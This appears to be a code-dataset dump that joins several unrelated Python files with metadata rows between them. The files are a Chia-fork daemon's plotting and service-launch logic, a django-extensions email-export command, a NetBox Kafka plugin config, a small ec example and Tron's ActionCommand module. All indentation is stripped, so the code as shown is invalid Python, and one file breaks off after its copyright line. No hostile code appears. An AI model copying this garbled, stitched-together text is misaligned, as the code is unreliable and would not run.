if message is None:
return None
response = create_payload("state_changed", message, service, "wallet_ui")
for websocket in websockets:
try:
await websocket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
websockets.remove(websocket)
await websocket.close()
def state_changed(self, service: str, message: Dict[str, Any]):
asyncio.create_task(self._state_changed(service, message))
async def _watch_file_changes(self, config, fp: TextIO, loop: asyncio.AbstractEventLoop):
id = config["id"]
final_words = ["Renamed final file"]
while True:
new_data = await loop.run_in_executor(io_pool_exc, fp.readline)
if config["state"] is not PlotState.RUNNING:
return None
if new_data not in (None, ""):
config["log"] = new_data if config["log"] is None else config["log"] + new_data
config["log_new"] = new_data
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.LOG_CHANGED, id))
if new_data:
for word in final_words:
if word in new_data:
return None
else:
time.sleep(0.5)
async def _track_plotting_progress(self, config, loop: asyncio.AbstractEventLoop):
file_path = config["out_file"]
with open(file_path, "r") as fp:
await self._watch_file_changes(config, fp, loop)
def _build_plotting_command_args(self, request: Any, ignoreCount: bool) -> List[str]:
service_name = request["service"]
k = request["k"]
n = 1 if ignoreCount else request["n"]
t = request["t"]
t2 = request["t2"]
d = request["d"]
b = request["b"]
u = request["u"]
r = request["r"]
f = request.get("f")
p = request.get("p")
c = request.get("c")
a = request.get("a")
e = request["e"]
x = request["x"]
override_k = request["overrideK"]
command_args: List[str] = []
command_args += service_name.split(" ")
command_args.append(f"-k{k}")
command_args.append(f"-n{n}")
command_args.append(f"-t{t}")
command_args.append(f"-2{t2}")
command_args.append(f"-d{d}")
command_args.append(f"-b{b}")
command_args.append(f"-u{u}")
command_args.append(f"-r{r}")
if a is not None:
command_args.append(f"-a{a}")
if f is not None:
command_args.append(f"-f{f}")
if p is not None:
command_args.append(f"-p{p}")
if c is not None:
command_args.append(f"-c{c}")
if e is True:
command_args.append("-e")
if x is True:
command_args.append("-x")
if override_k is True:
command_args.append("--override-k")
self.log.debug(f"command_args are {command_args}")
return command_args
def _is_serial_plotting_running(self, queue: str = "default") -> bool:
response = False
for item in self.plots_queue:
if item["queue"] == queue and item["parallel"] is False and item["state"] is PlotState.RUNNING:
response = True
return response
def _get_plots_queue_item(self, id: str):
config = next(item for item in self.plots_queue if item["id"] == id)
return config
def _run_next_serial_plotting(self, loop: asyncio.AbstractEventLoop, queue: str = "default"):
next_plot_id = None
if self._is_serial_plotting_running(queue) is True:
return None
for item in self.plots_queue:
if item["queue"] == queue and item["state"] is PlotState.SUBMITTED and item["parallel"] is False:
next_plot_id = item["id"]
if next_plot_id is not None:
loop.create_task(self._start_plotting(next_plot_id, loop, queue))
async def _start_plotting(self, id: str, loop: asyncio.AbstractEventLoop, queue: str = "default"):
current_process = None
try:
log.info(f"Starting plotting with ID {id}")
config = self._get_plots_queue_item(id)
if config is None:
raise Exception(f"Plot queue config with ID {id} does not exist")
state = config["state"]
if state is not PlotState.SUBMITTED:
raise Exception(f"Plot with ID {id} has no state submitted")
id = config["id"]
delay = config["delay"]
await asyncio.sleep(delay)
if config["state"] is not PlotState.SUBMITTED:
return None
service_name = config["service_name"]
command_args = config["command_args"]
# Set the -D/--connect_to_daemon flag to signify that the child should connect
# to the daemon to access the keychain
command_args.append("-D")
self.log.debug(f"command_args before launch_plotter are {command_args}")
self.log.debug(f"self.root_path before launch_plotter is {self.root_path}")
process, pid_path = launch_plotter(self.root_path, service_name, command_args, id)
current_process = process
config["state"] = PlotState.RUNNING
config["out_file"] = plotter_log_path(self.root_path, id).absolute()
config["process"] = process
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
if service_name not in self.services:
self.services[service_name] = []
self.services[service_name].append(process)
await self._track_plotting_progress(config, loop)
config["state"] = PlotState.FINISHED
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_name}") # lgtm [py/clear-text-logging-sensitive-data]
error = Exception("Start plotting failed")
config["state"] = PlotState.FINISHED
config["error"] = error
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
raise error
finally:
if current_process is not None:
self.services[service_name].remove(current_process)
current_process.wait() # prevent zombies
self._run_next_serial_plotting(loop, queue)
async def start_plotting(self, request: Dict[str, Any]):
service_name = request["service"]
delay = request.get("delay", 0)
parallel = request.get("parallel", False)
size = request.get("k")
count = request.get("n", 1)
queue = request.get("queue", "default")
if ("p" in request) and ("c" in request):
response = {
"success": False,
"service_name": service_name,
"error": "Choose one of pool_contract_address and pool_public_key",
}
return response
ids: List[str] = []
for k in range(count):
id = str(uuid.uuid4())
ids.append(id)
config = {
"id": id,
"size": size,
"queue": queue,
"service_name": service_name,
"command_args": self._build_plotting_command_args(request, True),
"parallel": parallel,
"delay": delay * k if parallel is True else delay,
"state": PlotState.SUBMITTED,
"deleted": False,
"error": None,
"log": None,
"process": None,
}
self.plots_queue.append(config)
# notify GUI about new plot queue item
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
# only the first item can start when user selected serial plotting
can_start_serial_plotting = k == 0 and self._is_serial_plotting_running(queue) is False
if parallel is True or can_start_serial_plotting:
log.info(f"Plotting will start in {config['delay']} seconds")
loop = asyncio.get_event_loop()
loop.create_task(self._start_plotting(id, loop, queue))
else:
log.info("Plotting will start automatically when previous plotting finish")
response = {
"success": True,
"ids": ids,
"service_name": service_name,
}
return response
async def stop_plotting(self, request: Dict[str, Any]) -> Dict[str, Any]:
id = request["id"]
config = self._get_plots_queue_item(id)
if config is None:
return {"success": False}
id = config["id"]
state = config["state"]
process = config["process"]
queue = config["queue"]
if config["state"] is PlotState.REMOVING:
return {"success": False}
try:
run_next = False
if process is not None and state == PlotState.RUNNING:
run_next = True
config["state"] = PlotState.REMOVING
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
await kill_process(process, self.root_path, service_plotter, id)
config["state"] = PlotState.FINISHED
config["deleted"] = True
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
self.plots_queue.remove(config)
if run_next:
loop = asyncio.get_event_loop()
self._run_next_serial_plotting(loop, queue)
return {"success": True}
except Exception as e:
log.error(f"Error during killing the plot process: {e}")
config["state"] = PlotState.FINISHED
config["error"] = str(e)
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
return {"success": False}
async def start_service(self, request: Dict[str, Any]):
service_command = request["service"]
error = None
success = False
testing = False
if "testing" in request:
testing = request["testing"]
if not validate_service(service_command):
error = "unknown service"
if service_command in self.services:
service = self.services[service_command]
r = service is not None and service.poll() is None
if r is False:
self.services.pop(service_command)
error = None
else:
error = f"Service {service_command} already running"
if error is None:
try:
exe_command = service_command
if testing is True:
exe_command = f"{service_command} --testing=true"
process, pid_path = launch_service(self.root_path, exe_command)
self.services[service_command] = process
success = True
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_command}")
error = "start failed"
response = {"success": success, "service": service_command, "error": error}
return response
async def stop_service(self, request: Dict[str, Any]) -> Dict[str, Any]:
service_name = request["service"]
result = await kill_service(self.root_path, self.services, service_name)
response = {"success": result, "service_name": service_name}
return response
async def is_running(self, request: Dict[str, Any]) -> Dict[str, Any]:
service_name = request["service"]
if service_name == service_plotter:
processes = self.services.get(service_name)
is_running = processes is not None and len(processes) > 0
response = {
"success": True,
"service_name": service_name,
"is_running": is_running,
}
else:
process = self.services.get(service_name)
is_running = process is not None and process.poll() is None
response = {
"success": True,
"service_name": service_name,
"is_running": is_running,
}
return response
async def exit(self) -> Dict[str, Any]:
jobs = []
for k in self.services.keys():
jobs.append(kill_service(self.root_path, self.services, k))
if jobs:
await asyncio.wait(jobs)
self.services.clear()
# TODO: fix this hack
asyncio.get_event_loop().call_later(5, lambda *args: sys.exit(0))
log.info("heather daemon exiting in 5 seconds")
response = {"success": True}
return response
async def register_service(self, websocket: WebSocketServerProtocol, request: Dict[str, Any]) -> Dict[str, Any]:
self.log.info(f"Register service {request}")
service = request["service"]
if service not in self.connections:
self.connections[service] = []
self.connections[service].append(websocket)
response: Dict[str, Any] = {"success": True}
if service == service_plotter:
response = {
"success": True,
"service": service,
"queue": self.extract_plot_queue(),
}
else:
self.remote_address_map[websocket] = service
if self.ping_job is None:
self.ping_job = asyncio.create_task(self.ping_task())
self.log.info(f"registered for service {service}")
log.info(f"{response}")
return response
def daemon_launch_lock_path(root_path: Path) -> Path:
"""
A path to a file that is lock when a daemon is launching but not yet started.
This prevents multiple instances from launching.
"""
return root_path / "run" / "start-daemon.launching"
def service_launch_lock_path(root_path: Path, service: str) -> Path:
"""
A path to a file that is lock when a service is running.
"""
service_name = service.replace(" ", "-").replace("/", "-")
return root_path / "run" / f"{service_name}.lock"
def pid_path_for_service(root_path: Path, service: str, id: str = "") -> Path:
"""
Generate a path for a PID file for the given service name.
"""
pid_name = service.replace(" ", "-").replace("/", "-")
return root_path / "run" / f"{pid_name}{id}.pid"
def plotter_log_path(root_path: Path, id: str):
return root_path / "plotter" / f"plotter_log_{id}.txt"
def launch_plotter(root_path: Path, service_name: str, service_array: List[str], id: str):
# we need to pass on the possibly altered HEATHER_ROOT
os.environ["HEATHER_ROOT"] = str(root_path)
service_executable = executable_for_service(service_array[0])
# Swap service name with name of executable
service_array[0] = service_executable
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # type: ignore
# Windows-specific.
# If the current process group is used, CTRL_C_EVENT will kill the parent and everyone in the group!
try:
creationflags: int = subprocess.CREATE_NEW_PROCESS_GROUP # type: ignore
except AttributeError: # Not on Windows.
creationflags = 0
plotter_path = plotter_log_path(root_path, id)
if plotter_path.parent.exists():
if plotter_path.exists():
plotter_path.unlink()
else:
mkdir(plotter_path.parent)
outfile = open(plotter_path.resolve(), "w")
log.info(f"Service array: {service_array}") # lgtm [py/clear-text-logging-sensitive-data]
process = subprocess.Popen(
service_array,
shell=False,
stderr=outfile,
stdout=outfile,
startupinfo=startupinfo,
creationflags=creationflags,
)
pid_path = pid_path_for_service(root_path, service_name, id)
try:
mkdir(pid_path.parent)
with open(pid_path, "w") as f:
f.write(f"{process.pid}\n")
except Exception:
pass
return process, pid_path
def launch_service(root_path: Path, service_command) -> Tuple[subprocess.Popen, Path]:
"""
Launch a child process.
"""
# set up HEATHER_ROOT
# invoke correct script
# save away PID
# we need to pass on the possibly altered HEATHER_ROOT
os.environ["HEATHER_ROOT"] = str(root_path)
log.debug(f"Launching service with HEATHER_ROOT: {os.environ['HEATHER_ROOT']}")
# Insert proper e
service_array = service_command.split()
service_executable = executable_for_service(service_array[0])
service_array[0] = service_executable
if service_command == "heather_full_node_simulator":
# Set the -D/--connect_to_daemon flag to signify that the child should connect
# to the daemon to access the keychain
service_array.append("-D")
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # type: ignore
# CREATE_NEW_PROCESS_GROUP allows graceful shutdown on windows, by CTRL_BREAK_EVENT signal
if sys.platform == "win32" or sys.platform == "cygwin":
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
else:
creationflags = 0
environ_copy = os.environ.copy()
process = subprocess.Popen(
service_array, shell=False, startupinfo=startupinfo, creationflags=creationflags, env=environ_copy
)
pid_path = pid_path_for_service(root_path, service_command)
try:
mkdir(pid_path.parent)
with open(pid_path, "w") as f:
f.write(f"{process.pid}\n")
except Exception:
pass
return process, pid_path
async def kill_process(
process: subprocess.Popen, root_path: Path, service_name: str, id: str, delay_before_kill: int = 15
) -> bool:
pid_path = pid_path_for_service(root_path, service_name, id)
if sys.platform == "win32" or sys.platform == "cygwin":
log.info("sending CTRL_BREAK_EVENT signal to %s", service_name)
# pylint: disable=E1101
kill(process.pid, signal.SIGBREAK) # type: ignore
else:
log.info("sending term signal to %s", service_name)
process.terminate()
count: float = 0
while count < delay_before_kill:
if process.poll() is not None:
break
await asyncio.sleep(0.5)
count += 0.5
else:
process.kill()
log.info("sending kill signal to %s", service_name)
r = process.wait()
log.info("process %s returned %d", service_name, r)
try:
pid_path_killed = pid_path.with_suffix(".pid-killed")
if pid_path_killed.exists():
pid_path_killed.unlink()
os.rename(pid_path, pid_path_killed)
except Exception:
pass
return True
async def kill_service(
root_path: Path, services: Dict[str, subprocess.Popen], service_name: str, delay_before_kill: int = 15
) -> bool:
process = services.get(service_name)
if process is None:
return False
del services[service_name]
result = await kill_process(process, root_path, service_name, "", delay_before_kill)
return result
def is_running(services: Dict[str, subprocess.Popen], service_name: str) -> bool:
process = services.get(service_name)
return process is not None and process.poll() is None
def create_server_for_daemon(root_path: Path):
routes = web.RouteTableDef()
services: Dict = dict()
@routes.get("/daemon/ping/")
async def ping(request: web.Request) -> web.Response:
return web.Response(text="pong")
@routes.get("/daemon/service/start/")
async def start_service(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None or not validate_service(service_name):
r = f"{service_name} unknown service"
return web.Response(text=str(r))
if is_running(services, service_name):
r = f"{service_name} already running"
return web.Response(text=str(r))
try:
process, pid_path = launch_service(root_path, service_name)
services[service_name] = process
r = f"{service_name} started"
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_name}")
r = f"{service_name} start failed"
return web.Response(text=str(r))
@routes.get("/daemon/service/stop/")
async def stop_service(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None:
r = f"{service_name} unknown service"
return web.Response(text=str(r))
r = str(await kill_service(root_path, services, service_name))
return web.Response(text=str(r))
@routes.get("/daemon/service/is_running/")
async def is_running_handler(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None:
r = f"{service_name} unknown service"
return web.Response(text=str(r))
r = str(is_running(services, service_name))
return web.Response(text=str(r))
@routes.get("/daemon/exit/")
async def exit(request: web.Request):
jobs = []
for k in services.keys():
jobs.append(kill_service(root_path, services, k))
if jobs:
await asyncio.wait(jobs)
services.clear()
# we can't await `site.stop()` here because that will cause a deadlock, waiting for this
# request to exit
def singleton(lockfile: Path, text: str = "semaphore") -> Optional[TextIO]:
"""
Open a lockfile exclusively.
"""
if not lockfile.parent.exists():
mkdir(lockfile.parent)
try:
if has_fcntl:
f = open(lockfile, "w")
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
else:
if lockfile.exists():
lockfile.unlink()
fd = os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
f = open(fd, "w")
f.write(text)
except IOError:
return None
return f
async def async_run_daemon(root_path: Path, wait_for_unlock: bool = False) -> int:
# When wait_for_unlock is true, we want to skip the check_keys() call in chia_init
# since it might be necessary to wait for the GUI to unlock the keyring first.
chia_init(root_path, should_check_keys=(not wait_for_unlock))
config = load_config(root_path, "config.yaml")
setproctitle("heather_daemon")
initialize_logging("daemon", config["logging"], root_path)
lockfile = singleton(daemon_launch_lock_path(root_path))
crt_path = root_path / config["daemon_ssl"]["private_crt"]
key_path = root_path / config["daemon_ssl"]["private_key"]
ca_crt_path = root_path / config["private_ssl_ca"]["crt"]
ca_key_path = root_path / config["private_ssl_ca"]["key"]
sys.stdout.flush()
json_msg = dict_to_json_str(
{
"message": "cert_path",
"success": True,
"cert": f"{crt_path}",
"key": f"{key_path}",
"ca_crt": f"{ca_crt_path}",
}
)
sys.stdout.write("\n" + json_msg + "\n")
sys.stdout.flush()
if lockfile is None:
print("daemon: already launching")
return 2
# TODO: clean this up, ensuring lockfile isn't removed until the listen port is open
create_server_for_daemon(root_path)
ws_server = WebSocketServer(
root_path, ca_crt_path, ca_key_path, crt_path, key_path, run_check_keys_on_unlock=wait_for_unlock
)
await ws_server.start()
assert ws_server.websocket_server is not None
await ws_server.websocket_server.wait_closed()
log.info("Daemon WebSocketServer closed")
# sys.stdout.close()
return 0
def run_daemon(root_path: Path, wait_for_unlock: bool = False) -> int:
result = asyncio.get_event_loop().run_until_complete(async_run_daemon(root_path, wait_for_unlock))
return result
def main(argv) -> int:
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.keychain import Keychain
wait_for_unlock = "--wait-for-unlock" in argv and Keychain.is_keyring_locked()
return run_daemon(DEFAULT_ROOT_PATH, wait_for_unlock)
if __name__ == "__main__":
main(sys.argv[1:])
| 38.604027
| 116
| 0.61737
|
6628ba9c7748d71e3e7e774e43e3394ba75210ad
| 5,056
|
py
|
Python
|
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | null | null | null |
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | 10
|
2020-06-05T21:41:01.000Z
|
2022-02-10T07:33:38.000Z
|
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from django.core.management.base import BaseCommand, CommandError
from django_extensions.compat import csv_writer as writer
from django_extensions.management.utils import signalcommand
FORMATS = [
'address',
'emails',
'google',
'outlook',
'linkedin',
'vcard',
]
def full_name(first_name, last_name, username, **extra):
"""Return full name or username."""
name = " ".join(n for n in [first_name, last_name] if n)
if not name:
return username
return name
class Command(BaseCommand):
help = "Export user email address list in one of a number of formats."
args = "[output file]"
label = 'filename to save to'
can_import_settings = True
encoding = 'utf-8' # RED_FLAG: add as an option -DougN
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--group', '-g', action='store', dest='group', default=None,
help='Limit to users which are part of the supplied group name',
),
parser.add_argument(
'--format', '-f', action='store', dest='format', default=FORMATS[0],
help="output format. May be one of %s." % ", ".join(FORMATS),
)
@signalcommand
def handle(self, *args, **options):
if len(args) > 1:
raise CommandError("extra arguments supplied")
group = options['group']
if group and not Group.objects.filter(name=group).count() == 1:
names = "', '".join(g['name'] for g in Group.objects.values('name'))
if names:
names = "'" + names + "'."
raise CommandError("Unknown group '" + group + "'. Valid group names are: " + names)
UserModel = get_user_model()
qs = UserModel.objects.all().order_by('last_name', 'first_name', 'username', 'email')
if group:
qs = qs.filter(groups__name=group).distinct()
qs = qs.values('last_name', 'first_name', 'username', 'email')
getattr(self, options['format'])(qs)
def address(self, qs):
"""
Single entry per line in the format of:
"full name" <my@address.com>;
"""
self.stdout.write("\n".join('"%s" <%s>;' % (full_name(**ent), ent['email']) for ent in qs))
self.stdout.write("\n")
def emails(self, qs):
"""
Single entry with email only in the format of:
my@address.com,
"""
self.stdout.write(",\n".join(ent['email'] for ent in qs))
self.stdout.write("\n")
def google(self, qs):
"""CSV format suitable for importing into google GMail"""
csvf = writer(sys.stdout)
csvf.writerow(['Name', 'Email'])
for ent in qs:
csvf.writerow([full_name(**ent), ent['email']])
def linkedin(self, qs):
"""
CSV format suitable for importing into linkedin Groups.
perfect for pre-approving members of a linkedin group.
"""
csvf = writer(sys.stdout)
csvf.writerow(['First Name', 'Last Name', 'Email'])
for ent in qs:
csvf.writerow([ent['first_name'], ent['last_name'], ent['email']])
def outlook(self, qs):
"""CSV format suitable for importing into outlook"""
csvf = writer(sys.stdout)
columns = ['Name', 'E-mail Address', 'Notes', 'E-mail 2 Address', 'E-mail 3 Address',
'Mobile Phone', 'Pager', 'Company', 'Job Title', 'Home Phone', 'Home Phone 2',
'Home Fax', 'Home Address', 'Business Phone', 'Business Phone 2',
'Business Fax', 'Business Address', 'Other Phone', 'Other Fax', 'Other Address']
csvf.writerow(columns)
empty = [''] * (len(columns) - 2)
for ent in qs:
csvf.writerow([full_name(**ent), ent['email']] + empty)
def vcard(self, qs):
"""VCARD format."""
try:
import vobject
except ImportError:
print(self.style.ERROR("Please install vobject to use the vcard export format."))
sys.exit(1)
out = sys.stdout
for ent in qs:
card = vobject.vCard()
card.add('fn').value = full_name(**ent)
if not ent['last_name'] and not ent['first_name']:
# fallback to fullname, if both first and lastname are not declared
card.add('n').value = vobject.vcard.Name(full_name(**ent))
else:
card.add('n').value = vobject.vcard.Name(ent['last_name'], ent['first_name'])
emailpart = card.add('email')
emailpart.value = ent['email']
emailpart.type_param = 'INTERNET'
out.write(card.serialize())
| 36.374101
| 99
| 0.578323
|
4368500c075e428a90fbf0c95852e42793d16e21
| 1,085
|
py
|
Python
|
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
from extras.plugins import PluginConfig
class NetboxKafkaProducerConfig(PluginConfig):
"""
This class defines attributes for the NetBox Animal Sounds plugin.
"""
# Plugin package name
name = 'netbox_kafka_producer'
# Human-friendly name and description
verbose_name = 'Netbox Kafka producer'
description = 'Easily publish NetBox changes to Kafka'
# Plugin version
version = '1.0.27'
# Plugin author
author = 'Eric Busto',
author_email = 'ebusto@nvidia.com',
# Configuration parameters that MUST be defined by the user (if any)
required_settings = []
# Default configuration parameter values, if not set by the user
default_settings = {
}
# Base URL path. If not set, the plugin name will be used.
# Caching config
caching_config = {}
middleware = ("netbox_kafka_producer.middleware.KafkaChangeMiddleware",)
default_settings = {
'kafka': {
'servers': 'kafka1:9092,kafka2:9092',
'topic': 'netbox',
},
}
config = NetboxKafkaProducerConfig
| 24.111111
| 76
| 0.662673
|
6855be0ddd5c277079d16dba6cba076f95456d20
| 338
|
py
|
Python
|
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | 2
|
2017-08-26T12:21:14.000Z
|
2017-08-28T10:55:04.000Z
|
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | null | null | null |
"""Helper import for demonstrating advanced examples.
"""
from ec.ec import task, arg, group
@task
@arg('arg1', type=int, desc='Value for arg1 (int)')
@arg('arg2', type=int)
def task1(arg1, arg2=1):
print arg1, arg2
@group(desc='Description for group1.')
class group1:
@task
@arg('arg1')
def task1(arg1):
print arg1 + arg1
| 18.777778
| 53
| 0.671598
|
99264019e9da52e801f053a8405677cfc268306b
| 6,692
|
py
|
Python
|
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
import logging
import os
from tron.config import schema
from tron.serialize import filehandler
from tron.utils import state, timeutils
log = logging.getLogger(__name__)
class ActionState(state.NamedEventState):
pass
class CompletedActionCommand(object):
"""This is a null object for ActionCommand."""
is_complete = True
is_done = True
is_failed = False
@staticmethod
def write_stderr(_):
pass
class ActionCommand(object):
"""An ActionCommand encapsulates a runnable task that is passed to a node
for execution.
A Node calls:
started (when the command starts)
exited (when the command exits)
write_<channel> (when output is received)
done (when the command is finished)
"""
COMPLETE = ActionState('complete')
FAILSTART = ActionState('failstart')
EXITING = ActionState('exiting', close=COMPLETE)
RUNNING = ActionState('running', exit=EXITING)
PENDING = ActionState('pending', start=RUNNING, exit=FAILSTART)
STDOUT = '.stdout'
STDERR = '.stderr'
def __init__(self, id, command, serializer=None):
self.id = id
self.command = command
self.machine = state.StateMachine(self.PENDING, delegate=self)
self.exit_status = None
self.start_time = None
self.end_time = None
self.stdout = filehandler.NullFileHandle
self.stderr = filehandler.NullFileHandle
if serializer:
self.stdout = serializer.open(self.STDOUT)
self.stderr = serializer.open(self.STDERR)
@property
def state(self):
return self.machine.state
@property
def attach(self):
return self.machine.attach
def started(self):
if not self.machine.check('start'):
return False
self.start_time = timeutils.current_timestamp()
return self.machine.transition('start')
def exited(self, exit_status):
if not self.machine.check('exit'):
return False
self.end_time = timeutils.current_timestamp()
self.exit_status = exit_status
return self.machine.transition('exit')
def write_stderr(self, value):
self.stderr.write(value)
def write_stdout(self, value):
self.stdout.write(value)
def done(self):
if not self.machine.check('close'):
return False
self.stdout.close()
self.stderr.close()
return self.machine.transition('close')
def handle_errback(self, result):
"""Handle an unexpected error while being run. This will likely be
an interval error. Cleanup the state of this AcctionCommand and log
something useful for debugging.
"""
log.error("Unknown failure for ActionCommand run %s: %s\n%s",
self.id, self.command, str(result))
self.exited(result)
self.done()
@property
def is_failed(self):
return bool(self.exit_status)
@property
def is_complete(self):
"""Complete implies done and success."""
return self.machine.state == self.COMPLETE
@property
def is_done(self):
"""Done implies no more work will be done, but might not be success."""
return self.machine.state in (self.COMPLETE, self.FAILSTART)
def __repr__(self):
return "ActionCommand %s %s: %s" % (self.id, self.command, self.state)
class StringBuffer(object):
"""An object which stores strings."""
def __init__(self):
self.buffer = []
def write(self, msg):
self.buffer.append(msg)
def get_value(self):
return ''.join(self.buffer).rstrip()
def close(self):
pass
class StringBufferStore(object):
"""A serializer object which can be passed to ActionCommand as a
serializer, but stores streams in memory.
"""
def __init__(self):
self.buffers = {}
def open(self, name):
return self.buffers.setdefault(name, StringBuffer())
def get_stream(self, name):
return self.buffers[name].get_value()
def clear(self):
self.buffers.clear()
class NoActionRunnerFactory(object):
"""Action runner factory that does not wrap the action run command."""
@classmethod
def create(cls, id, command, serializer):
return ActionCommand(id, command, serializer)
@classmethod
def build_stop_action_command(cls, _id, _command):
"""It is not possible to stop action commands without a runner."""
raise NotImplementedError("An action_runner is required to stop.")
class SubprocessActionRunnerFactory(object):
"""Run actions by wrapping them in `action_runner.py`."""
runner_exec_name = "action_runner.py"
status_exec_name = "action_status.py"
def __init__(self, status_path, exec_path):
self.status_path = status_path
self.exec_path = exec_path
@classmethod
def from_config(cls, config):
return cls(config.remote_status_path, config.remote_exec_path)
def create(self, id, command, serializer):
command = self.build_command(id, command, self.runner_exec_name)
return ActionCommand(id, command, serializer)
def build_command(self, id, command, exec_name):
status_path = os.path.join(self.status_path, id)
runner_path = os.path.join(self.exec_path, exec_name)
return '''%s "%s" "%s"''' % (runner_path, status_path, command)
def build_stop_action_command(self, id, command):
command = self.build_command(id, command, self.status_exec_name)
run_id = '%s.%s' % (id, command)
return ActionCommand(run_id, command, StringBufferStore())
def __eq__(self, other):
return (self.__class__ == other.__class__ and
self.status_path == other.status_path and
self.exec_path == other.exec_path)
def __ne__(self, other):
return not self == other
def create_action_runner_factory_from_config(config):
"""A factory-factory method which returns a callable that can be used to
create ActionCommand objects. The factory definition should match the
constructor for ActionCommand.
"""
if not config:
return NoActionRunnerFactory
if config.runner_type not in schema.ActionRunnerTypes:
raise ValueError("Unknown runner type: %s", config.runner_type)
if config.runner_type == schema.ActionRunnerTypes.none:
return NoActionRunnerFactory
if config.runner_type == schema.ActionRunnerTypes.subprocess:
return SubprocessActionRunnerFactory.from_config(config)
| 30.418182
| 79
| 0.653915
|
440b4c8c70928e461edb9675070009070ace5d6c
| 767
|
py
|
Python
|
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | null | null | null |
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | 4
|
2018-06-20T08:10:35.000Z
|
2018-06-23T05:18:02.000Z
|
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class WxUser(models.Model):
id = models.BigAutoField(primary_key=True)
session_id = models.CharField('session_id', max_length=150)
nickname = models.CharField('昵称', max_length=150)
sex = models.IntegerField('性别')
province = models.CharField('省份', max_length=150)
city = models.CharField('城市', max_length=150)
country = models.CharField('城市', max_length=150)
headimgurl = models.CharField('头像', max_length=150)
privilege = models.CharField('特权', max_length=150)
unionid = models.CharField('统一标识', max_length=150)
class WxOpenid(models.Model):
openid = models.CharField('openid', max_length=150)
access_token = models.CharField('access_token', max_length=150)
| 42.611111
| 67
| 0.720991
|
59939695a51a170ffadfe045fb4c65647999db3a
| 12,483
|
py
|
Python
|
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2019-2020 SAP SE or an SAP affiliate company. All rights reserved. This file is
